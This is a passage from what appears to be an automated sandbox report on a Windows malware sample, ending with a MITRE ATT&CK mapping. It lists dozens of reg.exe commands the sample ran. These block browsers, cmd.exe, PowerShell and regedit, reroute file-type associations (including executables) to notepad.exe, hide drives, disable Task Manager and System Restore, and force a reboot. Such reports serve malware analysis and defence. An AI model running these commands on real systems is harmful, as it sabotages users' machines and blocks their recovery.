    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "112" /t REG_SZ /d "opera_crashreporter.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3864
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "113" /t REG_SZ /d "opera_autoupdate.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3100
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "114" /t REG_SZ /d "opera.exe" /f
    3⤵
    PID:3560
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "115" /t REG_SZ /d "MicrosoftEdge.exe" /f
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "116" /t REG_SZ /d "MicrosoftEdgeCP.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3748
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "117" /t REG_SZ /d "MicrosoftEdgeSH.exe" /f
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "118" /t REG_SZ /d "launcher.exe" /f
    3⤵
    PID:4688
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "119" /t REG_SZ /d "regedit.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4272
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Windows\1.jpg /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:736
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\mp3file\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:2896
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\mp4file\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:3204
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\exefile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies system executable filetype association
    PID:2224
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\pngfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:2384
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\icofile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1516
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\pdffile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4020
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\docxfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\docfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:3856
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\csvfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4644
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\hfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4612
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\cppfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:4320
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\oggfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4636
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\avifile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:4868
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\isofile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4640
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\zipfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:3164
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\rarfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:1216
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\mkvfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:2724
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\pptfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:5036
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\jpgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:3768
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\xlsxfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1924
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\jpegfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4240
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\tiffile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4204
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\tmpfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:2972
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\dmgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4572
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\slnfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:3224
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\7zfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4920
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\afile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4056
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\aafile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:2336
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\001file\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:5100
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\allfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1896
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\binfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1792
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\asmfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:3416
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\svgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:4276
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\bmpfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:5060
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\gzfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1212
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\cabfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:2268
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\cfgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:5084
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\cmdfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:5088
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\comfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies system executable filetype association
    - Modifies registry class
    PID:4752
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\cplfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1636
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\curfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:3616
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\ctfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4508
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\dllfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1932
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\htmfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4264
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\htmlfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4700
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\wshfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\vbsfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:852
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\jsfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4676
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\logfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:5040
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\wsffile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:5104
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\jarfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\cplfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4984
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSecurityTab /t REG_DWORD /d "1" /f
    3⤵
    PID:216
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d "67108863" /f
    3⤵
    PID:212
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d "67108863" /f
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d "1" /f
    3⤵
    PID:3864
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d "1" /f
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d "1" /f
    3⤵
    PID:3556
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d "1" /f
    3⤵
    PID:4048
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d "2" /f
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v RestrictToPermittedSnapins /t REG_DWORD /d "1" /f
    3⤵
    PID:4688
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d "2" /f
    3⤵
    PID:4272
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "121" /t REG_SZ /d "cmd.exe" /f
    3⤵
    PID:3204
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "120" /t REG_SZ /d "powershell.exe" /f
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DisableCAD /d "0" /f
    3⤵
    PID:404
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
    3⤵
    PID:4020
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
    3⤵
    PID:3912
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t REG_DWORD /v "DisableRegistryTools" /d "1" /f
    3⤵
    - Disables RegEdit via registry modification
    PID:3948
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown -r -t 20
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4564

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3971055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3172

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Change Default File Association

T1042

Hidden Files and Directories

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Hidden Files and Directories

Modify Registry